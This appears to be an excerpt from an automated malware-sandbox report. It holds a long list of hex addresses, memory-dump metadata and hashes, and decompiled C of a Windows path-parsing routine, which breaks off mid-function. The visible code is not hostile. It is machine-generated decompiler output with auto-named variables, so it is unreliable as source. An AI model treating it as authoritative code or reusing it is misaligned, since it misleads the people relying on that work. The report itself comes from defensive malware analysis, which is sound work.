                                                                                                    0x00aa6e84
                                                                                                    0x00aa710f
                                                                                                    0x00aa710f
                                                                                                    0x00aa6e8c
                                                                                                    0x00aa6e8e
                                                                                                    0x00aa6e8e
                                                                                                    0x00aa6e97
                                                                                                    0x00aef5d3
                                                                                                    0x00aef5d3
                                                                                                    0x00aa6e9d
                                                                                                    0x00aa6ea3
                                                                                                    0x00aa6eaa
                                                                                                    0x00aa6ead
                                                                                                    0x00aa6eb2
                                                                                                    0x00aa6eb4
                                                                                                    0x00aa6eb7
                                                                                                    0x00aa7466
                                                                                                    0x00aa7466
                                                                                                    0x00000000
                                                                                                    0x00aa6ebd
                                                                                                    0x00aa6ebd
                                                                                                    0x00aa6ec4
                                                                                                    0x00aa6eca
                                                                                                    0x00aa6ecc
                                                                                                    0x00aa6ecf
                                                                                                    0x00aa6ed2
                                                                                                    0x00aa6ede
                                                                                                    0x00aef5df
                                                                                                    0x00aef5e0
                                                                                                    0x00000000
                                                                                                    0x00aef5e0
                                                                                                    0x00aa6ee6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa6eec
                                                                                                    0x00aa6ef3
                                                                                                    0x00aa7181
                                                                                                    0x00aa6f02
                                                                                                    0x00aa6f02
                                                                                                    0x00aa6f02
                                                                                                    0x00aa6f0b
                                                                                                    0x00aa6f0d
                                                                                                    0x00aa6f10
                                                                                                    0x00aa6f17
                                                                                                    0x00aa6f21
                                                                                                    0x00aa6f24
                                                                                                    0x00aa6f2d
                                                                                                    0x00aa6f31
                                                                                                    0x00aa6f36
                                                                                                    0x00aa6f3d
                                                                                                    0x00aa7413
                                                                                                    0x00aa7416
                                                                                                    0x00aa7419
                                                                                                    0x00aa741c
                                                                                                    0x00aa7421
                                                                                                    0x00aa742b
                                                                                                    0x00aa742b
                                                                                                    0x00aa742e
                                                                                                    0x00aa7439
                                                                                                    0x00aef60b
                                                                                                    0x00aef60b
                                                                                                    0x00aef615
                                                                                                    0x00aef619
                                                                                                    0x00aa743f
                                                                                                    0x00aa7447
                                                                                                    0x00aa7454
                                                                                                    0x00aa745a
                                                                                                    0x00aa745f
                                                                                                    0x00aa745f
                                                                                                    0x00000000
                                                                                                    0x00aa7439
                                                                                                    0x00aa7425
                                                                                                    0x00aef5e9
                                                                                                    0x00aef5ed
                                                                                                    0x00aef5f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef5fd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef603
                                                                                                    0x00aef603
                                                                                                    0x00000000
                                                                                                    0x00aa6f43
                                                                                                    0x00aa6f43
                                                                                                    0x00aa6f45
                                                                                                    0x00aa6f48
                                                                                                    0x00aa6f4e
                                                                                                    0x00aa6f65
                                                                                                    0x00aa6f68
                                                                                                    0x00aa721f
                                                                                                    0x00aa6f83
                                                                                                    0x00aa6f86
                                                                                                    0x00aa72dc
                                                                                                    0x00aa72dc
                                                                                                    0x00aa6f9e
                                                                                                    0x00aa6fa1
                                                                                                    0x00aa6fa3
                                                                                                    0x00aa6fa5
                                                                                                    0x00aa6fa8
                                                                                                    0x00aa6fab
                                                                                                    0x00aa6fae
                                                                                                    0x00aa6fb1
                                                                                                    0x00aa6fb4
                                                                                                    0x00aa6fb6
                                                                                                    0x00aa6fb9
                                                                                                    0x00aa6fbf
                                                                                                    0x00aa718a
                                                                                                    0x00aa718e
                                                                                                    0x00aef831
                                                                                                    0x00aef831
                                                                                                    0x00aef833
                                                                                                    0x00aef836
                                                                                                    0x00000000
                                                                                                    0x00aef836
                                                                                                    0x00aa7194
                                                                                                    0x00000000
                                                                                                    0x00aef658
                                                                                                    0x00aef658
                                                                                                    0x00aef65a
                                                                                                    0x00aef65d
                                                                                                    0x00aef662
                                                                                                    0x00aef662
                                                                                                    0x00aef665
                                                                                                    0x00aef667
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef669
                                                                                                    0x00aef66c
                                                                                                    0x00aef670
                                                                                                    0x00aef673
                                                                                                    0x00aef67a
                                                                                                    0x00aef67a
                                                                                                    0x00aef67b
                                                                                                    0x00aef67e
                                                                                                    0x00aef681
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef683
                                                                                                    0x00aef683
                                                                                                    0x00000000
                                                                                                    0x00aef683
                                                                                                    0x00aef675
                                                                                                    0x00aef678
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef678
                                                                                                    0x00aef686
                                                                                                    0x00aef688
                                                                                                    0x00aef68b
                                                                                                    0x00aef68e
                                                                                                    0x00aef691
                                                                                                    0x00aef694
                                                                                                    0x00aef698
                                                                                                    0x00aef69c
                                                                                                    0x00aef6a0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7397
                                                                                                    0x00aa739c
                                                                                                    0x00aa739f
                                                                                                    0x00aa73a3
                                                                                                    0x00aa73a5
                                                                                                    0x00aef6bb
                                                                                                    0x00aef6c1
                                                                                                    0x00aef6c4
                                                                                                    0x00aa73ab
                                                                                                    0x00aa73ab
                                                                                                    0x00aa73ab
                                                                                                    0x00aa73b1
                                                                                                    0x00aa73b5
                                                                                                    0x00aa73ba
                                                                                                    0x00aa73c0
                                                                                                    0x00aa73c3
                                                                                                    0x00aa73c7
                                                                                                    0x00aa73cc
                                                                                                    0x00aa73d0
                                                                                                    0x00aa73d3
                                                                                                    0x00aef6cc
                                                                                                    0x00aef6d4
                                                                                                    0x00aef6d9
                                                                                                    0x00aef6dd
                                                                                                    0x00aef6e1
                                                                                                    0x00aef6e5
                                                                                                    0x00aef6f0
                                                                                                    0x00aef6fc
                                                                                                    0x00aef700
                                                                                                    0x00aef709
                                                                                                    0x00aef70e
                                                                                                    0x00aef710
                                                                                                    0x00aef784
                                                                                                    0x00aef788
                                                                                                    0x00aef78b
                                                                                                    0x00aef78e
                                                                                                    0x00aef790
                                                                                                    0x00aef792
                                                                                                    0x00aef795
                                                                                                    0x00aef798
                                                                                                    0x00aef7b7
                                                                                                    0x00aef7b7
                                                                                                    0x00aef7ba
                                                                                                    0x00aef7ba
                                                                                                    0x00000000
                                                                                                    0x00aef7ba
                                                                                                    0x00aef79a
                                                                                                    0x00aef79d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef79f
                                                                                                    0x00aef7a4
                                                                                                    0x00aef7a7
                                                                                                    0x00aef7ab
                                                                                                    0x00aef7ae
                                                                                                    0x00aef7b1
                                                                                                    0x00000000
                                                                                                    0x00aef7b1
                                                                                                    0x00aef712
                                                                                                    0x00aef717
                                                                                                    0x00aef74c
                                                                                                    0x00aef74e
                                                                                                    0x00aef752
                                                                                                    0x00aef756
                                                                                                    0x00aef75d
                                                                                                    0x00aef761
                                                                                                    0x00aef764
                                                                                                    0x00aef76c
                                                                                                    0x00aef771
                                                                                                    0x00aef775
                                                                                                    0x00aef778
                                                                                                    0x00aef77c
                                                                                                    0x00000000
                                                                                                    0x00aef77c
                                                                                                    0x00aef719
                                                                                                    0x00aef71d
                                                                                                    0x00aef720
                                                                                                    0x00aef723
                                                                                                    0x00aef726
                                                                                                    0x00aef729
                                                                                                    0x00aef72e
                                                                                                    0x00aef740
                                                                                                    0x00aef744
                                                                                                    0x00000000
                                                                                                    0x00aef744
                                                                                                    0x00aef730
                                                                                                    0x00aef732
                                                                                                    0x00aef735
                                                                                                    0x00aef738
                                                                                                    0x00000000
                                                                                                    0x00aa73d9
                                                                                                    0x00aa73d9
                                                                                                    0x00aa73db
                                                                                                    0x00aa73de
                                                                                                    0x00aa73e1
                                                                                                    0x00aa73e4
                                                                                                    0x00aa73e7
                                                                                                    0x00aa73ea
                                                                                                    0x00aa73ef
                                                                                                    0x00aa73f2
                                                                                                    0x00aa73f6
                                                                                                    0x00aa73f9
                                                                                                    0x00aa73f9
                                                                                                    0x00aa73fe
                                                                                                    0x00aa7401
                                                                                                    0x00aa7406
                                                                                                    0x00aa7409
                                                                                                    0x00000000
                                                                                                    0x00aa7409
                                                                                                    0x00000000
                                                                                                    0x00aef7c5
                                                                                                    0x00aef7ca
                                                                                                    0x00aef7cd
                                                                                                    0x00aef7d1
                                                                                                    0x00aef7d3
                                                                                                    0x00aef7da
                                                                                                    0x00aef7e0
                                                                                                    0x00aef7e3
                                                                                                    0x00aef7e3
                                                                                                    0x00aef7e6
                                                                                                    0x00aef7d5
                                                                                                    0x00aef7d5
                                                                                                    0x00aef7d5
                                                                                                    0x00aef7e9
                                                                                                    0x00aef7eb
                                                                                                    0x00aef7f0
                                                                                                    0x00aef7f3
                                                                                                    0x00aef7f5
                                                                                                    0x00aef7f8
                                                                                                    0x00aef7fb
                                                                                                    0x00aef7fe
                                                                                                    0x00aef801
                                                                                                    0x00aef80f
                                                                                                    0x00aef814
                                                                                                    0x00aef803
                                                                                                    0x00aef803
                                                                                                    0x00aef806
                                                                                                    0x00aef806
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa719d
                                                                                                    0x00aa71a2
                                                                                                    0x00aa71a5
                                                                                                    0x00aa71a9
                                                                                                    0x00aa71ab
                                                                                                    0x00aef826
                                                                                                    0x00aef829
                                                                                                    0x00aa71b1
                                                                                                    0x00aa71b1
                                                                                                    0x00aa71ba
                                                                                                    0x00aa71ba
                                                                                                    0x00aa71bf
                                                                                                    0x00aa71c5
                                                                                                    0x00aa71cf
                                                                                                    0x00aa71d2
                                                                                                    0x00aa71d8
                                                                                                    0x00aa71dd
                                                                                                    0x00aa71e4
                                                                                                    0x00aa71e7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7275
                                                                                                    0x00aa727a
                                                                                                    0x00aa727d
                                                                                                    0x00aa727f
                                                                                                    0x00aa7282
                                                                                                    0x00aa7284
                                                                                                    0x00aef6a8
                                                                                                    0x00aef6aa
                                                                                                    0x00aef6aa
                                                                                                    0x00aa728a
                                                                                                    0x00aa728f
                                                                                                    0x00aa7292
                                                                                                    0x00aa7297
                                                                                                    0x00aa729a
                                                                                                    0x00aa729d
                                                                                                    0x00aa72a0
                                                                                                    0x00aa72a5
                                                                                                    0x00aa72a9
                                                                                                    0x00aa72ac
                                                                                                    0x00aa72af
                                                                                                    0x00aa72b2
                                                                                                    0x00aa72b5
                                                                                                    0x00aa72b7
                                                                                                    0x00aa72ba
                                                                                                    0x00aa72be
                                                                                                    0x00aa72be
                                                                                                    0x00aa72c2
                                                                                                    0x00aa72c5
                                                                                                    0x00aa72c8
                                                                                                    0x00aef6b2
                                                                                                    0x00aef6b2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa6fc5
                                                                                                    0x00aa6fc5
                                                                                                    0x00aa6fcc
                                                                                                    0x00aa6fd8
                                                                                                    0x00aa6fda
                                                                                                    0x00aa6fdd
                                                                                                    0x00aa6fe3
                                                                                                    0x00aa7162
                                                                                                    0x00aef845
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef84e
                                                                                                    0x00aef8c4
                                                                                                    0x00aef8c8
                                                                                                    0x00aef8cb
                                                                                                    0x00aef8ce
                                                                                                    0x00aa70e0
                                                                                                    0x00aa70e0
                                                                                                    0x00aa70e3
                                                                                                    0x00aa70e3
                                                                                                    0x00aa70ea
                                                                                                    0x00aa70ef
                                                                                                    0x00aa70f1
                                                                                                    0x00aa70f4
                                                                                                    0x00aa70fc
                                                                                                    0x00aa70fd
                                                                                                    0x00aa70fe
                                                                                                    0x00aa710c
                                                                                                    0x00aa710c
                                                                                                    0x00aef850
                                                                                                    0x00aef858
                                                                                                    0x00aef87a
                                                                                                    0x00aef88a
                                                                                                    0x00aef88d
                                                                                                    0x00aef890
                                                                                                    0x00aef893
                                                                                                    0x00aef895
                                                                                                    0x00aef898
                                                                                                    0x00aef8a4
                                                                                                    0x00aef8ad
                                                                                                    0x00aef8b0
                                                                                                    0x00aef8b3
                                                                                                    0x00aef8b3
                                                                                                    0x00aef8a4
                                                                                                    0x00aa6fec
                                                                                                    0x00aa6fec
                                                                                                    0x00aa6fee
                                                                                                    0x00000000
                                                                                                    0x00aa6ff1
                                                                                                    0x00aa6ff8
                                                                                                    0x00000000
                                                                                                    0x00aa6ffe
                                                                                                    0x00aa7004
                                                                                                    0x00aa7006
                                                                                                    0x00aa7006
                                                                                                    0x00aa7010
                                                                                                    0x00aa7017
                                                                                                    0x00aa701e
                                                                                                    0x00aa7072
                                                                                                    0x00aa7074
                                                                                                    0x00aa707e
                                                                                                    0x00aa7083
                                                                                                    0x00aa7087
                                                                                                    0x00aa7088
                                                                                                    0x00aa706c
                                                                                                    0x00aa706c
                                                                                                    0x00aa706d
                                                                                                    0x00000000
                                                                                                    0x00aa706d
                                                                                                    0x00aa707c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa707c
                                                                                                    0x00aa7020
                                                                                                    0x00aa7023
                                                                                                    0x00aa71ef
                                                                                                    0x00aa71ef
                                                                                                    0x00aa71f2
                                                                                                    0x00aa71f7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa71fd
                                                                                                    0x00aa7200
                                                                                                    0x00aa7205
                                                                                                    0x00aa720b
                                                                                                    0x00aa720e
                                                                                                    0x00aa72eb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa72f6
                                                                                                    0x00000000
                                                                                                    0x00aa7030
                                                                                                    0x00aa7037
                                                                                                    0x00aa703e
                                                                                                    0x00aa7055
                                                                                                    0x00aa705a
                                                                                                    0x00aa7062
                                                                                                    0x00aef908
                                                                                                    0x00aef90e
                                                                                                    0x00aef90f
                                                                                                    0x00aef90f
                                                                                                    0x00aef908
                                                                                                    0x00aa7062
                                                                                                    0x00aa705a
                                                                                                    0x00000000
                                                                                                    0x00aa7045
                                                                                                    0x00aa7045
                                                                                                    0x00aa7049
                                                                                                    0x00aa704a
                                                                                                    0x00aa704d
                                                                                                    0x00aa704e
                                                                                                    0x00000000
                                                                                                    0x00aa704e
                                                                                                    0x00aa703e
                                                                                                    0x00aa7068
                                                                                                    0x00aa7069
                                                                                                    0x00000000
                                                                                                    0x00aa7069
                                                                                                    0x00aa72fc
                                                                                                    0x00aa7301
                                                                                                    0x00aa7304
                                                                                                    0x00aa7314
                                                                                                    0x00aa7314
                                                                                                    0x00aa7319
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7325
                                                                                                    0x00aa732d
                                                                                                    0x00aa7330
                                                                                                    0x00aa7356
                                                                                                    0x00aa7357
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7332
                                                                                                    0x00aa7332
                                                                                                    0x00aa7337
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7343
                                                                                                    0x00aa734b
                                                                                                    0x00aa734e
                                                                                                    0x00aa7361
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7367
                                                                                                    0x00aa7367
                                                                                                    0x00aa7368
                                                                                                    0x00000000
                                                                                                    0x00aa7368
                                                                                                    0x00aa7350
                                                                                                    0x00aa7351
                                                                                                    0x00aa7351
                                                                                                    0x00000000
                                                                                                    0x00aa7332
                                                                                                    0x00aef8f9
                                                                                                    0x00aef8f9
                                                                                                    0x00aef8fa
                                                                                                    0x00000000
                                                                                                    0x00aef8fa
                                                                                                    0x00aa7306
                                                                                                    0x00aa730e
                                                                                                    0x00aef8ee
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef8f4
                                                                                                    0x00000000
                                                                                                    0x00aa730e
                                                                                                    0x00aa7214
                                                                                                    0x00aa7214
                                                                                                    0x00aa7217
                                                                                                    0x00000000
                                                                                                    0x00aa7217
                                                                                                    0x00aa702c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa702c
                                                                                                    0x00aa708d
                                                                                                    0x00aa7094
                                                                                                    0x00aa7098
                                                                                                    0x00aa70a0
                                                                                                    0x00aa738c
                                                                                                    0x00aa738d
                                                                                                    0x00aa738d
                                                                                                    0x00aa70a0
                                                                                                    0x00aa7098
                                                                                                    0x00aa70a6
                                                                                                    0x00aa70ab
                                                                                                    0x00aa70b3
                                                                                                    0x00aa70b5
                                                                                                    0x00aa70cd
                                                                                                    0x00aa70cd
                                                                                                    0x00aa70d0
                                                                                                    0x00aa70d8
                                                                                                    0x00aa711a
                                                                                                    0x00aa711c
                                                                                                    0x00aa711c
                                                                                                    0x00aa7121
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa712b
                                                                                                    0x00aa712b
                                                                                                    0x00aa7130
                                                                                                    0x00aa737e
                                                                                                    0x00aa7381
                                                                                                    0x00000000
                                                                                                    0x00aa7381
                                                                                                    0x00aa7138
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7144
                                                                                                    0x00aa7144
                                                                                                    0x00aa70da
                                                                                                    0x00aa70da
                                                                                                    0x00aa70dd
                                                                                                    0x00000000
                                                                                                    0x00aa70dd
                                                                                                    0x00aa70b7
                                                                                                    0x00aa70b8
                                                                                                    0x00aa70bb
                                                                                                    0x00aa70c2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa70c7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa70c9
                                                                                                    0x00aa70ca
                                                                                                    0x00000000
                                                                                                    0x00aa70ad
                                                                                                    0x00aa70ad
                                                                                                    0x00aa70af
                                                                                                    0x00000000
                                                                                                    0x00aa70af
                                                                                                    0x00aa7148
                                                                                                    0x00aa714d
                                                                                                    0x00aef8e2
                                                                                                    0x00aef8e2
                                                                                                    0x00aa7153
                                                                                                    0x00aa7154
                                                                                                    0x00aa7157
                                                                                                    0x00000000
                                                                                                    0x00aa7157
                                                                                                    0x00aef87c
                                                                                                    0x00aef87f
                                                                                                    0x00aef882
                                                                                                    0x00000000
                                                                                                    0x00aef882
                                                                                                    0x00aef85e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef864
                                                                                                    0x00aef869
                                                                                                    0x00aef86c
                                                                                                    0x00000000
                                                                                                    0x00aef86c
                                                                                                    0x00aa7168
                                                                                                    0x00aa7170
                                                                                                    0x00aef8d6
                                                                                                    0x00aef8d6
                                                                                                    0x00aa7176
                                                                                                    0x00aa7179
                                                                                                    0x00000000
                                                                                                    0x00aa7179
                                                                                                    0x00aa6fe9
                                                                                                    0x00aa6fe9
                                                                                                    0x00000000
                                                                                                    0x00aa6fe9
                                                                                                    0x00aa6fbf
                                                                                                    0x00aa6f8c
                                                                                                    0x00aa6f93
                                                                                                    0x00aa72d6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa72d6
                                                                                                    0x00aa6f99
                                                                                                    0x00aa6f99
                                                                                                    0x00aa6f99
                                                                                                    0x00000000
                                                                                                    0x00aa6f68
                                                                                                    0x00aa6f50
                                                                                                    0x00aa6f56
                                                                                                    0x00aa722c
                                                                                                    0x00aef629
                                                                                                    0x00aef629
                                                                                                    0x00000000
                                                                                                    0x00aef629
                                                                                                    0x00aa7232
                                                                                                    0x00aa7239
                                                                                                    0x00aef623
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef623
                                                                                                    0x00aa723f
                                                                                                    0x00aa7242
                                                                                                    0x00aef64e
                                                                                                    0x00aef64e
                                                                                                    0x00000000
                                                                                                    0x00aef64e
                                                                                                    0x00aa7248
                                                                                                    0x00aa724f
                                                                                                    0x00aa7373
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa7379
                                                                                                    0x00aa7255
                                                                                                    0x00aa7258
                                                                                                    0x00aef63c
                                                                                                    0x00aef648
                                                                                                    0x00000000
                                                                                                    0x00aef648
                                                                                                    0x00aa725e
                                                                                                    0x00aa7265
                                                                                                    0x00aef636
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aef636
                                                                                                    0x00aa726b
                                                                                                    0x00aa726b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa6f56
                                                                                                    0x00aa6f3d
                                                                                                    0x00aa6ed2
                                                                                                    0x00000000
                                                                                                    0x00aa6ec4

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 906f617bae5c30b9a6d7823ded54b999be2d591151f73650d1cc8c570718be99
                                                                                                    • Instruction ID: 3a7b4fc053a04713bebbb5257dcd51521f2498e2a30b853f05ef24c3f7a83451
                                                                                                    • Opcode Fuzzy Hash: 906f617bae5c30b9a6d7823ded54b999be2d591151f73650d1cc8c570718be99
                                                                                                    • Instruction Fuzzy Hash: 3F027E71D082558FCF28CF99C894AAEB7B1EF46700F65412EE816AB2D1E7709C85CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AA4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E00AA4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xb7d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00ABF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00AA6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00AA4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00AA6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00AA45F8))) {
												case 0:
													_v568 = 0xa61078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xa611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00AA4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00ACF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00ACF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
